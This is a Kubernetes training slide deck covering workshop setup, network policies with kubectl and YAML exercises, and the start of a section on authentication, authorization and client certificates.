class: title, self-paced Kubernetes Avancé
.nav[*Self-paced version*] .debug[ ``` ``` These slides have been built from commit: fd5c4f7 [shared/title.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/title.md)] --- class: title, in-person Kubernetes Avancé
.footnote[ **Slides[:](https://www.youtube.com/watch?v=h16zyxiwDLY) https://2020-06-enix.container.training/** ] .debug[[shared/title.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/title.md)] --- ## Intros - Hello! We are: - .emoji[👷🏻♀️] AJ ([@s0ulshake](https://twitter.com/s0ulshake), [EphemeraSearch](https://www.ephemerasearch.com/)) - .emoji[🐳] Jérôme ([@jpetazzo](https://twitter.com/jpetazzo), Enix SAS) - The training will run from 9:30 to 13:00 - There will be a break at 11:00 - Feel free to interrupt for questions at any time - *Especially when you see full screen container pictures!* .debug[[logistics.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/logistics.md)] --- ## A brief introduction - This was initially written by [Jérôme Petazzoni](https://twitter.com/jpetazzo) to support in-person, instructor-led workshops and tutorials - Credit is also due to [multiple contributors](https://github.com/jpetazzo/container.training/graphs/contributors) — thank you! - You can also follow along on your own, at your own pace - We included as much information as possible in these slides - We recommend having a mentor to help you ... - ... Or be comfortable spending some time reading the Kubernetes [documentation](https://kubernetes.io/docs/) ... - ... And looking for answers on [StackOverflow](http://stackoverflow.com/questions/tagged/kubernetes) and other outlets .debug[[k8s/intro.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/intro.md)] --- class: self-paced ## Hands on, you shall practice - Nobody ever became a Jedi by spending their lives reading Wookiepedia - Likewise, it will take more than merely *reading* these slides to make you an expert - These slides include *tons* of exercises and examples - They assume that you have access to a Kubernetes cluster - If you are attending a workshop or tutorial:
you will be given specific instructions to access your cluster - If you are doing this on your own:
the first chapter will give you various options to get your own cluster .debug[[k8s/intro.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/intro.md)] --- ## Accessing these slides now - We recommend that you open these slides in your browser: https://2020-06-enix.container.training/ - Use arrows to move to next/previous slide (up, down, left, right, page up, page down) - Type a slide number + ENTER to go to that slide - The slide number is also visible in the URL bar (e.g. .../#123 for slide 123) .debug[[shared/about-slides.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/about-slides.md)] --- ## Accessing these slides later - Slides will remain online so you can review them later if needed (let's say we'll keep them online at least 1 year, how about that?) - You can download the slides using this URL: https://2020-06-enix.container.training/slides.zip (then open the file `4.yml.html`) - You will find new versions of these slides on: https://container.training/ .debug[[shared/about-slides.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/about-slides.md)] --- ## These slides are open source - You are welcome to use, re-use, share these slides - These slides are written in markdown - The sources of these slides are available in a public GitHub repository: https://github.com/jpetazzo/container.training - Typos? Mistakes? Questions? Feel free to hover over the bottom of the slide ... .footnote[.emoji[👇] Try it! The source file will be shown and you can view it on GitHub and fork and edit it.] .debug[[shared/about-slides.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/about-slides.md)] --- class: extra-details ## Extra details - This slide has a little magnifying glass in the top left corner - This magnifying glass indicates slides that provide extra details - Feel free to skip them if: - you are in a hurry - you are new to this and want to avoid cognitive overload - you want only the most essential information - You can review these slides another time if you want, they'll be waiting for you ☺ .debug[[shared/about-slides.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/about-slides.md)] --- ## Chat room - We've set up a chat room that we will monitor during the workshop - Don't hesitate to use it to ask questions, or get help, or share feedback - The chat room will also be available after the workshop - Join the chat room: [Gitter](https://gitter.im/jpetazzo/formation-highfive-202006) - Say hi in the chat room!
.debug[[shared/chat-room-im.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/chat-room-im.md)] --- name: toc-module-1 ## Module 1 - [Pre-requirements](#toc-pre-requirements) - [Network policies](#toc-network-policies) - [Authentication and authorization](#toc-authentication-and-authorization) .debug[(auto-generated TOC)] --- name: toc-module-2 ## Module 2 - [Extending the Kubernetes API](#toc-extending-the-kubernetes-api) - [Operators](#toc-operators) .debug[(auto-generated TOC)] --- name: toc-module-3 ## Module 3 - [Resource Limits](#toc-resource-limits) - [Defining min, max, and default resources](#toc-defining-min-max-and-default-resources) - [Namespace quotas](#toc-namespace-quotas) - [Limiting resources in practice](#toc-limiting-resources-in-practice) - [Checking pod and node resource usage](#toc-checking-pod-and-node-resource-usage) - [Cluster sizing](#toc-cluster-sizing) - [The Horizontal Pod Autoscaler](#toc-the-horizontal-pod-autoscaler) - [Collecting metrics with Prometheus](#toc-collecting-metrics-with-prometheus) .debug[(auto-generated TOC)] --- name: toc-module-4 ## Module 4 - [Stateful sets](#toc-stateful-sets) - [Running a Consul cluster](#toc-running-a-consul-cluster) - [Persistent Volumes Claims](#toc-persistent-volumes-claims) - [Local Persistent Volumes](#toc-local-persistent-volumes) - [Highly available Persistent Volumes](#toc-highly-available-persistent-volumes) .debug[(auto-generated TOC)] --- name: toc-module-5 ## Module 5 - [(Bonus material)](#toc-bonus-material) - [Pod Security Policies](#toc-pod-security-policies) - [Designing an operator](#toc-designing-an-operator) .debug[(auto-generated TOC)] .debug[[shared/toc.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/toc.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/Container-Ship-Freighter-Navigation-Elbe-Romance-1782991.jpg)] --- name: toc-pre-requirements class: title Pre-requirements .nav[ [Previous section](#toc-) | [Back to table of contents](#toc-module-1) | [Next section](#toc-network-policies) ] .debug[(automatically generated title slide)] --- # Pre-requirements - Be comfortable with the UNIX command line - navigating directories - editing files - a little bit of bash-fu (environment variables, loops) - Some Docker knowledge - `docker run`, `docker ps`, `docker build` - ideally, you know how to write a Dockerfile and build it
(even if it's a `FROM` line and a couple of `RUN` commands) - It's totally OK if you are not a Docker expert! .debug[[shared/prereqs.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/prereqs.md)] --- class: title *Tell me and I forget.*
*Teach me and I remember.*
*Involve me and I learn.* Misattributed to Benjamin Franklin [(Probably inspired by Chinese Confucian philosopher Xunzi)](https://www.barrypopik.com/index.php/new_york_city/entry/tell_me_and_i_forget_teach_me_and_i_may_remember_involve_me_and_i_will_lear/) .debug[[shared/prereqs.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/prereqs.md)] --- ## Hands-on sections - The whole workshop is hands-on - We are going to build, ship, and run containers! - You are invited to reproduce all the demos - All hands-on sections are clearly identified, like the gray rectangle below .exercise[ - This is the stuff you're supposed to do! - Go to https://2020-06-enix.container.training/ to view these slides ] .debug[[shared/prereqs.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/prereqs.md)] --- class: in-person ## Where are we going to run our containers? .debug[[shared/prereqs.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/prereqs.md)] --- class: in-person, pic ![You get a cluster](images/you-get-a-cluster.jpg) .debug[[shared/prereqs.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/prereqs.md)] --- class: in-person ## You get a cluster of cloud VMs - Each person gets a private cluster of cloud VMs (not shared with anybody else) - They'll remain up for the duration of the workshop - You should have a little card with login+password+IP addresses - You can automatically SSH from one VM to another - The nodes have aliases: `node1`, `node2`, etc. .debug[[shared/prereqs.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/prereqs.md)] --- class: in-person ## Why don't we run containers locally? - Installing this stuff can be hard on some machines (32 bits CPU or OS... Laptops without administrator access... etc.) - *"The whole team downloaded all these container images from the WiFi!
... and it went great!"* (Literally no-one ever) - All you need is a computer (or even a phone or tablet!), with: - an internet connection - a web browser - an SSH client .debug[[shared/prereqs.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/prereqs.md)] --- class: in-person ## SSH clients - On Linux, OS X, FreeBSD... you are probably all set - On Windows, get one of these: - [putty](http://www.putty.org/) - Microsoft [Win32 OpenSSH](https://github.com/PowerShell/Win32-OpenSSH/wiki/Install-Win32-OpenSSH) - [Git BASH](https://git-for-windows.github.io/) - [MobaXterm](http://mobaxterm.mobatek.net/) - On Android, [JuiceSSH](https://juicessh.com/) ([Play Store](https://play.google.com/store/apps/details?id=com.sonelli.juicessh)) works pretty well - Nice-to-have: [Mosh](https://mosh.org/) instead of SSH, if your internet connection tends to lose packets .debug[[shared/prereqs.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/prereqs.md)] --- class: in-person, extra-details ## What is this Mosh thing? *You don't have to use Mosh or even know about it to follow along.
We're just telling you about it because some of us think it's cool!* - Mosh is "the mobile shell" - It is essentially SSH over UDP, with roaming features - It retransmits packets quickly, so it works great even on lossy connections (Like hotel or conference WiFi) - It has intelligent local echo, so it works great even in high-latency connections (Like hotel or conference WiFi) - It supports transparent roaming when your client IP address changes (Like when you hop from hotel to conference WiFi) .debug[[shared/prereqs.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/prereqs.md)] --- class: in-person, extra-details ## Using Mosh - To install it: `(apt|yum|brew) install mosh` - It has been pre-installed on the VMs that we are using - To connect to a remote machine: `mosh user@host` (It is going to establish an SSH connection, then hand off to UDP) - It requires UDP ports to be open (By default, it uses a UDP port between 60000 and 61000) .debug[[shared/prereqs.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/prereqs.md)] --- ## WebSSH - The virtual machines are also accessible via WebSSH - This can be useful if: - you can't install an SSH client on your machine - SSH connections are blocked (by firewall or local policy) - To use WebSSH, connect to the IP address of the remote VM on port 1080 (each machine runs a WebSSH server) - Then provide the login and password indicated on your card .debug[[shared/webssh.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/webssh.md)] --- ## Good to know - WebSSH uses WebSocket - If you're having connection issues, try to disable your HTTP proxy (many HTTP proxies can't handle WebSocket properly) - Most keyboard shortcuts should work, except Ctrl-W (as it is hardwired by the browser to "close this tab") .debug[[shared/webssh.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/webssh.md)] --- class: in-person ## Connecting to our lab environment .exercise[ - Log into the first VM (`node1`) with your SSH client: ```bash ssh `user`@`A.B.C.D` ``` (Replace `user` and `A.B.C.D` with the user and IP address provided to you) ] You should see a prompt looking like this: ``` [A.B.C.D] (...) user@node1 ~ $ ``` If anything goes wrong — ask for help! .debug[[shared/connecting.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/connecting.md)] --- ## Doing or re-doing the workshop on your own? - Use something like [Play-With-Docker](http://play-with-docker.com/) or [Play-With-Kubernetes](https://training.play-with-kubernetes.com/) Zero setup effort; but environments are short-lived and might have limited resources - Create your own cluster (local or cloud VMs) Small setup effort; small cost; flexible environments - Create a bunch of clusters for you and your friends ([instructions](https://github.com/jpetazzo/container.training/tree/master/prepare-vms)) Bigger setup effort; ideal for group training .debug[[shared/connecting.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/connecting.md)] --- ## For a consistent Kubernetes experience ... - If you are using your own Kubernetes cluster, you can use [shpod](https://github.com/jpetazzo/shpod) - `shpod` provides a shell running in a pod on your own cluster - It comes with many tools pre-installed (helm, stern...)
- These tools are used in many exercises in these slides - `shpod` also gives you completion and a fancy prompt .debug[[shared/connecting.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/connecting.md)] --- class: self-paced ## Get your own Docker nodes - If you already have some Docker nodes: great! - If not: let's get some thanks to Play-With-Docker .exercise[ - Go to http://www.play-with-docker.com/ - Log in - Create your first node ] You will need a Docker ID to use Play-With-Docker. (Creating a Docker ID is free.) .debug[[shared/connecting.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/connecting.md)] --- ## We will (mostly) interact with node1 only *These remarks apply only when using multiple nodes, of course.* - Unless instructed, **all commands must be run from the first VM, `node1`** - We will only check out/copy the code on `node1` - During normal operations, we do not need access to the other nodes - If we had to troubleshoot issues, we would use a combination of: - SSH (to access system logs, daemon status...) - Docker API (to check running containers and container engine status) .debug[[shared/connecting.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/connecting.md)] --- ## Terminals Once in a while, the instructions will say:
"Open a new terminal." There are multiple ways to do this: - create a new window or tab on your machine, and SSH into the VM; - use screen or tmux on the VM and open a new window from there. You are welcome to use the method that you feel the most comfortable with. .debug[[shared/connecting.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/connecting.md)] --- ## Tmux cheatsheet [Tmux](https://en.wikipedia.org/wiki/Tmux) is a terminal multiplexer like `screen`. *You don't have to use it or even know about it to follow along.
But some of us like to use it to switch between terminals.
It has been preinstalled on your workshop nodes.* - Ctrl-b c → creates a new window - Ctrl-b n → go to next window - Ctrl-b p → go to previous window - Ctrl-b " → split window top/bottom - Ctrl-b % → split window left/right - Ctrl-b Alt-1 → rearrange windows in columns - Ctrl-b Alt-2 → rearrange windows in rows - Ctrl-b arrows → navigate to other windows - Ctrl-b d → detach session - tmux attach → reattach to session .debug[[shared/connecting.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/connecting.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/ShippingContainerSFBay.jpg)] --- name: toc-network-policies class: title Network policies .nav[ [Previous section](#toc-pre-requirements) | [Back to table of contents](#toc-module-1) | [Next section](#toc-authentication-and-authorization) ] .debug[(automatically generated title slide)] --- # Network policies - Namespaces help us to *organize* resources - Namespaces do not provide isolation - By default, every pod can contact every other pod - By default, every service accepts traffic from anyone - If we want this to be different, we need *network policies* .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## What's a network policy? A network policy is defined by the following things. - A *pod selector* indicating which pods it applies to e.g.: "all pods in namespace `blue` with the label `zone=internal`" - A list of *ingress rules* indicating which inbound traffic is allowed e.g.: "TCP connections to ports 8000 and 8080 coming from pods with label `zone=dmz`, and from the external subnet 4.42.6.0/24, except 4.42.6.5" - A list of *egress rules* indicating which outbound traffic is allowed A network policy can provide ingress rules, egress rules, or both. .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## How do network policies apply? - A pod can be "selected" by any number of network policies - If a pod isn't selected by any network policy, then its traffic is unrestricted (In other words: in the absence of network policies, all traffic is allowed) - If a pod is selected by at least one network policy, then all traffic is blocked ... ... unless it is explicitly allowed by one of these network policies .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- class: extra-details ## Traffic filtering is flow-oriented - Network policies deal with *connections*, not individual packets - Example: to allow HTTP (80/tcp) connections to pod A, you only need an ingress rule (You do not need a matching egress rule to allow response traffic to go through) - This also applies for UDP traffic (Allowing DNS traffic can be done with a single rule) - Network policy implementations use stateful connection tracking .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Pod-to-pod traffic - Connections from pod A to pod B have to be allowed by both pods: - pod A has to be unrestricted, or allow the connection as an *egress* rule - pod B has to be unrestricted, or allow the connection as an *ingress* rule - As a consequence: if a network policy restricts traffic going from/to a pod,
the restriction cannot be overridden by a network policy selecting another pod - This prevents an entity managing network policies in namespace A (but without permission to do so in namespace B) from adding network policies giving them access to namespace B .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## The rationale for network policies - In network security, it is generally considered better to "deny all, then allow selectively" (The other approach, "allow all, then block selectively" makes it too easy to leave holes) - As soon as one network policy selects a pod, the pod enters this "deny all" logic - Further network policies can open additional access - Good network policies should be scoped as precisely as possible - In particular: make sure that the selector is not too broad (Otherwise, you end up affecting pods that were otherwise well secured) .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Our first network policy This is our game plan: - run a web server in a pod - create a network policy to block all access to the web server - create another network policy to allow access only from specific pods .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Running our test web server .exercise[ - Let's use the `nginx` image: ```bash kubectl create deployment testweb --image=nginx ``` - Find out the IP address of the pod with one of these two commands: ```bash kubectl get pods -o wide -l app=testweb IP=$(kubectl get pods -l app=testweb -o json | jq -r .items[0].status.podIP) ``` - Check that we can connect to the server: ```bash curl $IP ``` ] The `curl` command should show us the "Welcome to nginx!" page. .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Adding a very restrictive network policy - The policy will select pods with the label `app=testweb` - It will specify an empty list of ingress rules (matching nothing) .exercise[ - Apply the policy in this YAML file: ```bash kubectl apply -f ~/container.training/k8s/netpol-deny-all-for-testweb.yaml ``` - Check if we can still access the server: ```bash curl $IP ``` ] The `curl` command should now time out. 
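If the `curl` command does *not* time out, your network plugin may not be enforcing network policies (more on that in the "important warning" slide later in this section). A quick way to double-check that the policy exists and selects our pod (the policy name below is the one used in the YAML shown on the next slide):

```bash
# List the network policies in the current namespace
kubectl get networkpolicies

# Show the pod selector and the (empty) list of ingress rules
kubectl describe networkpolicy deny-all-for-testweb
```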
.debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Looking at the network policy This is the file that we applied: ```yaml kind: NetworkPolicy apiVersion: networking.k8s.io/v1 metadata: name: deny-all-for-testweb spec: podSelector: matchLabels: app: testweb ingress: [] ``` .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Allowing connections only from specific pods - We want to allow traffic from pods with the label `run=testcurl` - Reminder: this label is automatically applied when we do `kubectl run testcurl ...` .exercise[ - Apply another policy: ```bash kubectl apply -f ~/container.training/k8s/netpol-allow-testcurl-for-testweb.yaml ``` ] .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Looking at the network policy This is the second file that we applied: ```yaml kind: NetworkPolicy apiVersion: networking.k8s.io/v1 metadata: name: allow-testcurl-for-testweb spec: podSelector: matchLabels: app: testweb ingress: - from: - podSelector: matchLabels: run: testcurl ``` .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Testing the network policy - Let's create pods with, and without, the required label .exercise[ - Try to connect to testweb from a pod with the `run=testcurl` label: ```bash kubectl run testcurl --rm -i --image=centos -- curl -m3 $IP ``` - Try to connect to testweb with a different label: ```bash kubectl run testkurl --rm -i --image=centos -- curl -m3 $IP ``` ] The first command will work (and show the "Welcome to nginx!" page). The second command will fail and time out after 3 seconds. (The timeout is obtained with the `-m3` option.) .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## An important warning - Some network plugins only have partial support for network policies - For instance, Weave added support for egress rules [in version 2.4](https://github.com/weaveworks/weave/pull/3313) (released in July 2018) - But only recently added support for ipBlock [in version 2.5](https://github.com/weaveworks/weave/pull/3367) (released in Nov 2018) - Unsupported features might be silently ignored (Making you believe that you are secure, when you're not) .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Network policies, pods, and services - Network policies apply to *pods* - A *service* can select multiple pods (And load balance traffic across them) - It is possible that we can connect to some pods, but not some others (Because of how network policies have been defined for these pods) - In that case, connections to the service will randomly pass or fail (Depending on whether the connection was sent to a pod that we have access to or not) .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Network policies and namespaces - A good strategy is to isolate a namespace, so that: - all the pods in the namespace can communicate together - other namespaces cannot access the pods - external access has to be enabled explicitly - Let's see what this would look like for the DockerCoins app! 
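(Side note before we dive in: ingress rules can also select sources by *namespace*, with a `namespaceSelector`. A minimal sketch, assuming namespaces carry a made-up `team=frontend` label, allowing traffic from all pods in those namespaces:)

```yaml
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
  name: allow-from-frontend-namespaces
spec:
  podSelector: {}
  ingress:
  - from:
    # "team=frontend" is a hypothetical label used for illustration
    - namespaceSelector:
        matchLabels:
          team: frontend
```

(The policies that we will use for DockerCoins rely only on pod selectors.)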
.debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Network policies for DockerCoins - We are going to apply two policies - The first policy will prevent traffic from other namespaces - The second policy will allow traffic to the `webui` pods - That's all we need for that app! .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Blocking traffic from other namespaces This policy selects all pods in the current namespace. It allows traffic only from pods in the current namespace. (An empty `podSelector` means "all pods.") ```yaml kind: NetworkPolicy apiVersion: networking.k8s.io/v1 metadata: name: deny-from-other-namespaces spec: podSelector: {} ingress: - from: - podSelector: {} ``` .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Allowing traffic to `webui` pods This policy selects all pods with label `app=webui`. It allows traffic from any source. (An empty `from` field means "all sources.") ```yaml kind: NetworkPolicy apiVersion: networking.k8s.io/v1 metadata: name: allow-webui spec: podSelector: matchLabels: app: webui ingress: - from: [] ``` .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Applying both network policies - Both network policies are declared in the file `k8s/netpol-dockercoins.yaml` .exercise[ - Apply the network policies: ```bash kubectl apply -f ~/container.training/k8s/netpol-dockercoins.yaml ``` - Check that we can still access the web UI from outside
(and that the app is still working correctly!) - Check that we can't connect anymore to `rng` or `hasher` through their ClusterIP ] Note: using `kubectl proxy` or `kubectl port-forward` allows us to connect regardless of existing network policies. This allows us to debug and troubleshoot easily, without having to poke holes in our firewall. .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Cleaning up our network policies - The network policies that we have installed block all traffic to the default namespace - We should remove them, otherwise further exercises will fail! .exercise[ - Remove all network policies: ```bash kubectl delete networkpolicies --all ``` ] .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Protecting the control plane - Should we add network policies to block unauthorized access to the control plane? (etcd, API server, etc.) -- - At first, it seems like a good idea ... -- - But it *shouldn't* be necessary: - not all network plugins support network policies - the control plane is secured by other methods (mutual TLS, mostly) - the code running in our pods can reasonably expect to contact the API
(and it can do so safely thanks to the API permission model) - If we block access to the control plane, we might disrupt legitimate code - ...Without necessarily improving security .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- ## Further resources - As always, the [Kubernetes documentation](https://kubernetes.io/docs/concepts/services-networking/network-policies/) is a good starting point - The API documentation has a lot of detail about the format of various objects: - [NetworkPolicy](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.12/#networkpolicy-v1-networking-k8s-io) - [NetworkPolicySpec](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.12/#networkpolicyspec-v1-networking-k8s-io) - [NetworkPolicyIngressRule](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.12/#networkpolicyingressrule-v1-networking-k8s-io) - etc. - And two resources by [Ahmet Alp Balkan](https://ahmet.im/): - a [very good talk about network policies](https://www.youtube.com/watch?list=PLj6h78yzYM2P-3-xqvmWaZbbI1sW-ulZb&v=3gGpMmYeEO8) at KubeCon North America 2017 - a repository of [ready-to-use recipes](https://github.com/ahmetb/kubernetes-network-policy-recipes) for network policies ??? :EN:- Isolating workloads with Network Policies :FR:- Isolation réseau avec les *network policies* .debug[[k8s/netpol.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/netpol.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/aerial-view-of-containers.jpg)] --- name: toc-authentication-and-authorization class: title Authentication and authorization .nav[ [Previous section](#toc-network-policies) | [Back to table of contents](#toc-module-1) | [Next section](#toc-extending-the-kubernetes-api) ] .debug[(automatically generated title slide)] --- # Authentication and authorization - In this section, we will: - define authentication and authorization - explain how they are implemented in Kubernetes - talk about tokens, certificates, service accounts, RBAC ... - But first: why do we need all this? .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## The need for fine-grained security - The Kubernetes API should only be available for identified users - we don't want "guest access" (except in very rare scenarios) - we don't want strangers to use our compute resources, delete our apps ... - our keys and passwords should not be exposed to the public - Users will often have different access rights - cluster admin (similar to UNIX "root") can do everything - developer might access specific resources, or a specific namespace - supervision might have read only access to *most* resources .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Example: custom HTTP load balancer - Let's imagine that we have a custom HTTP load balancer for multiple apps - Each app has its own *Deployment* resource - By default, the apps are "sleeping" and scaled to zero - When a request comes in, the corresponding app gets woken up - After some inactivity, the app is scaled down again - This HTTP load balancer needs API access (to scale up/down) - What if *a wild vulnerability appears*? 
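For reference, "permission to scale these Deployments, and nothing else" can be expressed with RBAC (which we will cover later in this section). A minimal sketch, with a made-up role name, granting access only to the `scale` subresource of Deployments:

```yaml
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  # hypothetical role name, for illustration only
  name: deployment-scaler
rules:
- apiGroups: ["apps"]
  resources: ["deployments/scale"]
  verbs: ["get", "update", "patch"]
```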
.debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Consequences of vulnerability - If the HTTP load balancer has the same API access as we do: *full cluster compromise (easy data leak, cryptojacking...)* - If the HTTP load balancer has `update` permissions on the Deployments: *defacement (easy), MITM / impersonation (medium to hard)* - If the HTTP load balancer only has permission to `scale` the Deployments: *denial-of-service* - All these outcomes are bad, but some are worse than others .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Definitions - Authentication = verifying the identity of a person On a UNIX system, we can authenticate with login+password, SSH keys ... - Authorization = listing what they are allowed to do On a UNIX system, this can include file permissions, sudoer entries ... - Sometimes abbreviated as "authn" and "authz" - In good modular systems, these things are decoupled (so we can e.g. change a password or SSH key without having to reset access rights) .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Authentication in Kubernetes - When the API server receives a request, it tries to authenticate it (it examines headers, certificates... anything available) - Many authentication methods are available and can be used simultaneously (we will see them on the next slide) - It's the job of the authentication method to produce: - the user name - the user ID - a list of groups - The API server doesn't interpret these; that'll be the job of *authorizers* .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Authentication methods - TLS client certificates (that's what we've been doing with `kubectl` so far) - Bearer tokens (a secret token in the HTTP headers of the request) - [HTTP basic auth](https://en.wikipedia.org/wiki/Basic_access_authentication) (carrying user and password in an HTTP header) - Authentication proxy (sitting in front of the API and setting trusted headers) .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Anonymous requests - If any authentication method *rejects* a request, it's denied (`401 Unauthorized` HTTP code) - If a request is neither rejected nor accepted by anyone, it's anonymous - the user name is `system:anonymous` - the list of groups is `[system:unauthenticated]` - By default, the anonymous user can't do anything (that's what you get if you just `curl` the Kubernetes API) .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## Authentication with TLS certificates - This is enabled in most Kubernetes deployments - The user name is derived from the `CN` in the client certificates - The groups are derived from the `O` fields in the client certificate - From the point of view of the Kubernetes API, users do not exist (i.e. 
they are not stored in etcd or anywhere else) - Users can be created (and added to groups) independently of the API - The Kubernetes API can be set up to use your custom CA to validate client certs .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: extra-details ## Viewing our admin certificate - Let's inspect the certificate we've been using all this time! .exercise[ - This command will show the `CN` and `O` fields for our certificate: ```bash kubectl config view \ --raw \ -o json \ | jq -r .users[0].user[\"client-certificate-data\"] \ | openssl base64 -d -A \ | openssl x509 -text \ | grep Subject: ``` ] Let's break down that command together! 😅 .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- class: extra-details ## Breaking down the command - `kubectl config view` shows the Kubernetes user configuration - `--raw` includes certificate information (which shows as REDACTED otherwise) - `-o json` outputs the information in JSON format - `| jq ...` extracts the field with the user certificate (in base64) - `| openssl base64 -d -A` decodes the base64 format (now we have a PEM file) - `| openssl x509 -text` parses the certificate and outputs it as plain text - `| grep Subject:` shows us the line that interests us → We are user `kubernetes-admin`, in group `system:masters`. (We will see later how and why this gives us the permissions that we have.) .debug[[k8s/authn-authz.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/authn-authz.md)] --- ## User certificates in practice - The Kubernetes API server does not support certificate revocation (see issue [#18982](https://github.com/kubernetes/kubernetes/issues/18982)) - As a result, we don't have an easy way to terminate someone's access (if their key is compromised, or they leave the organization) - Option 1: re-create a new CA and re-issue everyone's certificates
